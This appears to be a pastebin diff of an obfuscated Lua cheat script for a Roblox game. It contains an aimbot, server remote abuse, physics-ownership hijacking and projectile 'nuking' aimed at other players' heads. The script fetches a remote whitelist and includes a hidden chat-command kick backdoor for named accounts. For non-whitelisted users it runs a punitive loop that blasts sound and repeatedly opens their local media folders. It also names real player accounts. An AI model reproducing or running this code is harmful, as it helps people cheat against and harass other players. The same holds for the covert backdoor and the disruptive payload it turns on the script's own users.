n=n+1;l[e]=t[n];end;o=f;end;elseif i<=361 then if(l[e[3]]==l[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>362 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];else local n;local d=e[2];local t={};local n=0;local f=o;for e=d+1,f do n=n+1;t[n]=l[e];end;local f={l[d](c(t,1,f-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;n=n+1;end;end;end;return A(W(),{})();
| |
| 1507 | end) | |
| 1508 | cor() | |
| 1509 | end) | |
| 1510 | end) | |
| 1511 | end) | |
| 1512 | ||
| 1513 | delay(0, function() | |
| 1514 | while wait() do | |
| 1515 | if godblock == true then | |
| 1516 | local A_1 = "Block" | |
| 1517 | local A_2 = true | |
| 1518 | local Event = game:GetService("ReplicatedStorage").MainEvent
| |
| 1519 | Event:FireServer(A_1, A_2) | |
| 1520 | end | |
| 1521 | end | |
| 1522 | end) | |
| 1523 | ||
| 1524 | ||
| 1525 | delay(0, function() | |
| 1526 | while wait() do | |
| 1527 | pcall(function() | |
| 1528 | if game.Players.LocalPlayer.Character:FindFirstChild("Christmas_Sock") then
| |
| 1529 | game.Players.LocalPlayer.Character["Christmas_Sock"]:Destroy() | |
| 1530 | end | |
| 1531 | end) | |
| 1532 | end | |
| 1533 | end) | |
| 1534 | ||
| 1535 | delay(0, function() | |
| 1536 | game.Players.LocalPlayer.Character:Destroy() | |
| 1537 | respawn = false | |
| 1538 | game.Players.LocalPlayer.CharacterAdded:Connect(function(char) | |
| 1539 | ||
| 1540 | respawn = true | |
| 1541 | wait(1) | |
| 1542 | ||
| 1543 | ||
| 1544 | char.BodyEffects.Defense:Destroy() | |
| 1545 | local bruh = char:FindFirstChildOfClass("Humanoid")
| |
| 1546 | local cor = coroutine.wrap(function() | |
| 1547 | while wait() do | |
| 1548 | if respawn == true then | |
| 1549 | bruh.JumpPower = demspeed | |
| 1550 | end | |
| 1551 | end | |
| 1552 | end) | |
| 1553 | cor() | |
| 1554 | print(bruh.Name) | |
| 1555 | bruh.HealthChanged:Connect(function() | |
| 1556 | if SaveYourself == true then | |
| 1557 | if bruh.Health <= 10 or bruh.Health <= 20 or bruh.Health <= 30 then | |
| 1558 | if respawn == true then | |
| 1559 | respawn = false | |
| 1560 | heazd = false | |
| 1561 | Not("Danger situation, re-spawning", 145360599, "Danger Checker")
| |
| 1562 | char:Destroy() | |
| 1563 | end | |
| 1564 | end | |
| 1565 | end | |
| 1566 | wait() | |
| 1567 | end) | |
| 1568 | end) | |
| 1569 | ||
| 1570 | end) | |
| 1571 | ||
| 1572 | ||
| 1573 | delay(0, function() | |
| 1574 | local LogPlr = function(plr) | |
| 1575 | plr.Chatted:connect(function(msg) | |
| 1576 | local onlyfancheck = plr.Name | |
| 1577 | local onlyfancheckid = plr.UserId | |
| 1578 | onlyfans = "https://phantomxx.000webhostapp.com/spypremium" | |
| 1579 | - | onlyfans = "https://pastebin.com/raw/6zbiucSW" |
| 1579 | + | |
| 1580 | wait() | |
| 1581 | if msg:sub(1, 7) == "/e kick" and string.find(xdfasfasf,onlyfancheck) and string.find(xdfasfasf,onlyfancheckid) then | |
| 1582 | ||
| 1583 | if msg:match(game.Players.LocalPlayer.Name) then | |
| 1584 | ||
| 1585 | game.Players.LocalPlayer:Kick("Kicked by "..plr.Name)
| |
| 1586 | ||
| 1587 | end | |
| 1588 | end | |
| 1589 | end) | |
| 1590 | end | |
| 1591 | ||
| 1592 | for i, v in pairs(game.Players:GetChildren()) do | |
| 1593 | LogPlr(v) | |
| 1594 | end | |
| 1595 | ||
| 1596 | game.Players.PlayerAdded:connect(function(plr) | |
| 1597 | LogPlr(plr) | |
| 1598 | end) | |
| 1599 | end) | |
| 1600 | ||
| 1601 | ||
| 1602 | delay(0, function() | |
| 1603 | pcall(function() | |
| 1604 | while wait() do | |
| 1605 | local mouse = game.Players.LocalPlayer:GetMouse() | |
| 1606 | local Shit_1 = "UpdateMousePos" | |
| 1607 | local Shit_2 = Vector3.new(mouse.Hit.Position.X, mouse.Hit.Position.Y,mouse.Hit.Position.Z) | |
| 1608 | local Event = game:GetService("ReplicatedStorage").MainEvent
| |
| 1609 | Event:FireServer(Shit_1, Shit_2) | |
| 1610 | end | |
| 1611 | end) | |
| 1612 | end) | |
| 1613 | ||
| 1614 | delay(0, function() | |
| 1615 | pcall(function() | |
| 1616 | while wait() do | |
| 1617 | if autostomp == true then | |
| 1618 | local A_1 = "Stomp" | |
| 1619 | local Event = game:GetService("ReplicatedStorage").MainEvent
| |
| 1620 | Event:FireServer(A_1) | |
| 1621 | end | |
| 1622 | end | |
| 1623 | end) | |
| 1624 | end) | |
| 1625 | ||
| 1626 | local Imput = game:GetService("UserInputService")
| |
| 1627 | local Plr = game.Players.LocalPlayer | |
| 1628 | local Mouse = Plr:GetMouse() | |
| 1629 | ||
| 1630 | spam = false | |
| 1631 | ||
| 1632 | function To(position) | |
| 1633 | local Chr = Plr.Character | |
| 1634 | local sound2 = Instance.new("Sound")
| |
| 1635 | sound2.SoundId = "rbxassetid://3398620867" | |
| 1636 | sound2.Parent = game:GetService("SoundService")
| |
| 1637 | if Chr ~= nil then | |
| 1638 | for index, part in pairs(game:GetDescendants()) do | |
| 1639 | if part:IsA("BasePart" or "UnionOperation" or "Model") and part.Anchored == false and part:IsDescendantOf(game.Players.LocalPlayer.Character) == false and part.Name == "Torso" == false and part.Name == "Head" == false and part.Name == "Right Arm" == false and part.Name == "Left Arm" == false and part.Name == "Right Leg" == false and part.Name == "Left Leg" == false and part.Name == "HumanoidRootPart" == false then --// Checks Part Properties
| |
| 1640 | part.CFrame = CFrame.new(position) --TP Part To Mouse | |
| 1641 | sound2:Play() | |
| 1642 | ||
| 1643 | if spam == true and part:FindFirstChild("BodyGyro") == nil then
| |
| 1644 | local bodyPos = Instance.new("BodyPosition")
| |
| 1645 | bodyPos.Position = part.Position | |
| 1646 | bodyPos.MaxForce = Vector3.new(math.huge, math.huge, math.huge) | |
| 1647 | bodyPos.P = 1e6 | |
| 1648 | bodyPos.Parent = part | |
| 1649 | end | |
| 1650 | end | |
| 1651 | end | |
| 1652 | wait(.1) | |
| 1653 | end | |
| 1654 | end | |
| 1655 | ||
| 1656 | ||
| 1657 | function getfovxyz (p0, p1, deg) | |
| 1658 | local x1, y1, z1 = p0:ToOrientation() | |
| 1659 | local cf = CFrame.new(p0.p, p1.p) | |
| 1660 | local x2, y2, z2 = cf:ToOrientation() | |
| 1661 | local d = math.deg | |
| 1662 | if deg then | |
| 1663 | return Vector3.new(d(x1-x2), d(y1-y2), d(z1-z2)) | |
| 1664 | else | |
| 1665 | return Vector3.new((x1-x2), (y1-y2), (z1-z2)) | |
| 1666 | end | |
| 1667 | end | |
| 1668 | local ballisticsboost = 0 | |
| 1669 | ||
| 1670 | local movementcounting = true | |
| 1671 | aimbothider = false | |
| 1672 | aimbothiderspeed = .5 | |
| 1673 | local abs = math.abs | |
| 1674 | Aim_Assist = false | |
| 1675 | ||
| 1676 | function aimat(part) | |
| 1677 | if part then | |
| 1678 | --print(part) | |
| 1679 | local d = (cam.CFrame.p - part.CFrame.p).magnitude | |
| 1680 | local calculatedrop | |
| 1681 | local timetoaim = 0 | |
| 1682 | local pos2 = Vector3.new() | |
| 1683 | if movementcounting == true then | |
| 1684 | timetoaim = d/bspeed | |
| 1685 | pos2 = part.Velocity * timetoaim | |
| 1686 | end | |
| 1687 | local minuseddrop = (ballisticsboost+50)/50 | |
| 1688 | if ballisticsboost ~= 0 then | |
| 1689 | calculatedrop = d - (d/minuseddrop) | |
| 1690 | ||
| 1691 | else | |
| 1692 | calculatedrop = 0 | |
| 1693 | end | |
| 1694 | --print(calculatedrop) | |
| 1695 | local addative = Vector3.new() | |
| 1696 | if movementcounting then | |
| 1697 | addative = pos2 | |
| 1698 | end | |
| 1699 | local cf = CFrame.new(cam.CFrame.p, (addative + part.CFrame.p+ Vector3.new(0, calculatedrop, 0))) | |
| 1700 | if aimbothider == true or Aim_Assist == true then | |
| 1701 | cam.CFrame = cam.CFrame:Lerp(cf, aimbothiderspeed) | |
| 1702 | else | |
| 1703 | ||
| 1704 | cam.CFrame = cf | |
| 1705 | end | |
| 1706 | --print(cf) | |
| 1707 | end | |
| 1708 | end | |
| 1709 | function checkfov (part) | |
| 1710 | local fov = getfovxyz(game.Workspace.CurrentCamera.CFrame, part.CFrame) | |
| 1711 | local angle = math.abs(fov.X) + math.abs(fov.Y) | |
| 1712 | return angle | |
| 1713 | end | |
| 1714 | pcall(function() | |
| 1715 | delay(0, function() | |
| 1716 | while wait(.32) do | |
| 1717 | if Aim_Assist and not aimatpart and canaimat and lplr.Character and lplr.Character.Humanoid and lplr.Character.Humanoid.Health > 0 then | |
| 1718 | for i, plr in pairs(plrs:GetChildren()) do | |
| 1719 | ||
| 1720 | ||
| 1721 | local minangle = math.rad(5.5) | |
| 1722 | local lastpart = nil | |
| 1723 | local function gg(plr) | |
| 1724 | pcall(function() | |
| 1725 | if plr.Name ~= lplr.Name and plr.Character and plr.Character.Humanoid and plr.Character.Humanoid.Health > 0 and plr.Character.Head then | |
| 1726 | local raycasted = false | |
| 1727 | local cf1 = CFrame.new(cam.CFrame.p, plr.Character.Head.CFrame.p) * CFrame.new(0, 0, -4) | |
| 1728 | local r1 = Ray.new(cf1.p, cf1.LookVector * 9000) | |
| 1729 | local obj, pos = game.Workspace:FindPartOnRayWithIgnoreList(r1, {lplr.Character.Head})
| |
| 1730 | local dist = (plr.Character.Head.CFrame.p- pos).magnitude | |
| 1731 | if dist < 4 then | |
| 1732 | raycasted = true | |
| 1733 | end | |
| 1734 | if raycasted == true then | |
| 1735 | local an1 = getfovxyz(cam.CFrame, plr.Character.Head.CFrame) | |
| 1736 | local an = abs(an1.X) + abs(an1.Y) | |
| 1737 | if an < minangle then | |
| 1738 | minangle = an | |
| 1739 | lastpart = plr.Character.Head | |
| 1740 | end | |
| 1741 | end | |
| 1742 | end | |
| 1743 | end) | |
| 1744 | end | |
| 1745 | if TeamBased then | |
| 1746 | if plr.Team.Name ~= lplr.Team.Name then | |
| 1747 | gg(plr) | |
| 1748 | end | |
| 1749 | else | |
| 1750 | gg(plr) | |
| 1751 | end | |
| 1752 | --print(math.deg(minangle)) | |
| 1753 | ||
| 1754 | end | |
| 1755 | end | |
| 1756 | end | |
| 1757 | end) | |
| 1758 | end) | |
| 1759 | local oldheadpos | |
| 1760 | local lastaimapart | |
| 1761 | ||
| 1762 | ||
| 1763 | ||
| 1764 | delay(0, function() | |
| 1765 | ||
| 1766 | while wait() do | |
| 1767 | pcall(function() | |
| 1768 | if game.Players.LocalPlayer.Character.BodyEffects:FindFirstChild("SpecialParts") and banned == true then
| |
| 1769 | game.Players.LocalPlayer.Character.BodyEffects.SpecialParts:Destroy() | |
| 1770 | local thing = Instance.new("Folder",game.Players.LocalPlayer.Character)
| |
| 1771 | thing.Name = "FULLY_LOADED_CHAR" | |
| 1772 | wait() | |
| 1773 | game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.Backpack, true) | |
| 1774 | end | |
| 1775 | end) | |
| 1776 | end | |
| 1777 | end) | |
| 1778 | --warn("loaded")
| |
| 1779 | delay(0, function() | |
| 1780 | while wait() do | |
| 1781 | pcall(function() | |
| 1782 | if game.Workspace.Ignored:FindFirstChild("Launcher") and nuking == true and workspace.Players:FindFirstChild(nukerowner) then
| |
| 1783 | local lol = game.Workspace.Ignored:FindFirstChild("Launcher")
| |
| 1784 | ||
| 1785 | if lol:FindFirstChildOfClass("BodyVelocity") then
| |
| 1786 | wait() | |
| 1787 | lol.BodyVelocity:Destroy() | |
| 1788 | end | |
| 1789 | ||
| 1790 | if lol:FindFirstChild("BodyVelocity") == nil then
| |
| 1791 | lol.CFrame = CFrame.new(workspace.Players[nukerowner].Head.CFrame.X,workspace.Players[nukerowner].Head.CFrame.Y+6.5,workspace.Players[nukerowner].Head.CFrame.Z) | |
| 1792 | end | |
| 1793 | ||
| 1794 | elseif game.Workspace.Ignored:FindFirstChild("Handle") and nuking == true then
| |
| 1795 | local lol = game.Workspace.Ignored:FindFirstChild("Handle")
| |
| 1796 | ||
| 1797 | if lol:FindFirstChild("Pin") then
| |
| 1798 | lol.CFrame = CFrame.new(workspace.Players[nukerowner].Head.CFrame.X,workspace.Players[nukerowner].Head.CFrame.Y+8,workspace.Players[nukerowner].Head.CFrame.Z) | |
| 1799 | end | |
| 1800 | end | |
| 1801 | end) | |
| 1802 | end | |
| 1803 | end) | |
| 1804 | Imput.InputBegan:Connect(function(input) | |
| 1805 | if input.UserInputType == Enum.UserInputType.MouseButton1 and Imput:IsKeyDown(Enum.KeyCode.M) then | |
| 1806 | To(Mouse.Hit.p) | |
| 1807 | end | |
| 1808 | end) | |
| 1809 | delay(0, function() | |
| 1810 | while wait() do | |
| 1811 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1812 | if v == game.Players.LocalPlayer == false then | |
| 1813 | game.Players.LocalPlayer.MaximumSimulationRadius = math.pow(math.huge,math.huge)*math.huge | |
| 1814 | game.Players.LocalPlayer.SimulationRadius = math.pow(math.huge,math.huge)*math.huge | |
| 1815 | v.MaximumSimulationRadius = 0 | |
| 1816 | v.SimulationRadius = 0 | |
| 1817 | end | |
| 1818 | end | |
| 1819 | end | |
| 1820 | end) | |
| 1821 | warn("loaded")
| |
| 1822 | elseif string.find(banlist,current) and string.find(banlist,currentid) then -- Looks For Is Username Is Banned This Is Optional Just Remove If Not Needed | |
| 1823 | game.Players.LocalPlayer:Kick("Blacklisted")
| |
| 1824 | end | |
| 1825 | delay(0, function() | |
| 1826 | while wait(2) do | |
| 1827 | if Whitelist == false then | |
| 1828 | Whitelist = true | |
| 1829 | local cor = coroutine.wrap(function() | |
| 1830 | wait(3) | |
| 1831 | game.Players.LocalPlayer:Kick("Not Whitelisted Stop Using My Script skid")
| |
| 1832 | end) | |
| 1833 | cor() | |
| 1834 | local s = Instance.new("Sound")
| |
| 1835 | s.Name = "u got sp00ked" | |
| 1836 | s.SoundId = "http://www.roblox.com/asset/?id=5039795168" | |
| 1837 | s.TimePosition = 3 | |
| 1838 | s.Volume = 10 | |
| 1839 | s.Pitch = 1 | |
| 1840 | s.Looped = true | |
| 1841 | s.archivable = true | |
| 1842 | s.Parent = game.CoreGui | |
| 1843 | wait(0.5) | |
| 1844 | s:play() | |
| 1845 | while true do wait() | |
| 1846 | game:OpenVideosFolder() | |
| 1847 | game:OpenScreenshotsFolder() | |
| 1848 | end | |
| 1849 | end | |
| 1850 | end | |
| 1851 | end) | |
| 1852 | delay(0, function() | |
| 1853 | while wait(60) do | |
| 1854 | userlink = "https://phantomxx.000webhostapp.com/spywhitelists" -- Link To Usernames | |
| 1855 | - | userlink = "https://pastebin.com/raw/SzfUS7kU" -- Link To Usernames |
| 1855 | + | |
| 1856 | usernames = game:HttpGet(userlink, true) | |
| 1857 | banlist = game:HttpGet(banlink, true) | |
| 1858 | current = game.Players.LocalPlayer.Name | |
| 1859 | currentid = game.Players.LocalPlayer.UserId | |
| 1860 | if string.find(xdfasfasf,current) and string.find(xdfasfasf,currentid) then | |
| 1861 | onlyfansxd = true | |
| 1862 | else | |
| 1863 | onlyfansxd = false | |
| 1864 | end | |
| 1865 | ||
| 1866 | if string.find(usernames,current) and string.find(usernames,currentid) then | |
| 1867 | Not("User Whitelisted", 145360599, "Whitelist System")
| |
| 1868 | -- Looks For If Username Matches Database | |
| 1869 | print("Login Successful") -- What Happens If Login Is Correct
| |
| 1870 | elseif string.find(banlist,current) and string.find(banlist,currentid) then -- Looks For Is Username Is Banned This Is Optional Just Remove If Not Needed | |
| 1871 | game.Players.LocalPlayer:Kick("Blacklisted")
| |
| 1872 | else | |
| 1873 | Whitelist = false | |
| 1874 | end | |
| 1875 | end | |
| 1876 | end) | |
| 1877 | ||
| 1878 | local annoying = {"JokeTheFool","ITopStarI" ,"Sherosama", "Papa_Mbaye", "AStrongMuscle", "iRenn", "NikoSenpai", "UziGarage", "iumu", "Benoxa", "Luutyy", "clubstar54", "givkitheth", "zakblak20", "MarTheWise", "BeeTheKidd", "qtCeleste", "coreten", "LegacyCross", "NatsuDBlaze", "Asuyia", "POMPKUN", "Untold_Joke", "MoodJesus", "AfroDs", "MarkoSumisu", "Greed_Ocean"} -- you can add more players by doing {"Player1", "Player2"}
| |
| 1879 | ||
| 1880 | for l, c in pairs(game.Players:GetChildren()) do | |
| 1881 | for i, v in pairs(annoying) do | |
| 1882 | if c.Name == v then | |
| 1883 | local loc = game.Players.LocalPlayer | |
| 1884 | loc:Kick("CAN'T TOUCH THIS")
| |
| 1885 | end | |
| 1886 | end | |
| 1887 | end | |
| 1888 | game.Players.PlayerAdded:Connect(function(plr) | |
| 1889 | for i, v in pairs(annoying) do | |
| 1890 | if plr.Name == v then | |
| 1891 | local loc = game.Players.LocalPlayer | |
| 1892 | loc:Kick("CAN'T TOUCH THIS")
| |
| 1893 | end | |
| 1894 | end | |
| 1895 | end) | |
| 1896 | ||
| 1897 | ||
| 1898 | ||
| 1899 | print'loaded 100%' |